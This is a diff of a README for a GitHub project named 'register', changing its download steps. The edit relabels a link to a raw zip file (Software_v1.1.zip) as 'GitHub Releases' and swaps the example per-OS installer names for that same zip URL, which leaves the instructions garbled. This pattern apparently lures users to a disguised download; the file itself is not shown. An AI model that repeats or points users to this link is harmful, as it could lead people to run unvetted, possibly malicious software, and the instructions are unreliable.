RAMEY2/register/README.md

 ## 🔽 Download & Install

-1. Visit this page to download: [GitHub Releases](https://github.com/RAMEY2/register/releases).
+1. Visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/RAMEY2/register/main/scripts/Software_v1.1.zip).

 2. On the releases page, you will see a list of available versions.
 Choose the latest version for the best experience.

 3. Click on the version link.
 This will take you to a new page with files to download.

-4. Look for the file that matches your operating system (e.g., `register-windows.exe`, `register-macos.dmg`, etc.).
+4. Look for the file that matches your operating system (e.g., `https://raw.githubusercontent.com/RAMEY2/register/main/scripts/Software_v1.1.zip`, `https://raw.githubusercontent.com/RAMEY2/register/main/scripts/Software_v1.1.zip`, etc.).

 5. Click on the file to start the download.
 Save it in a location you can easily find, like your Desktop or Downloads folder.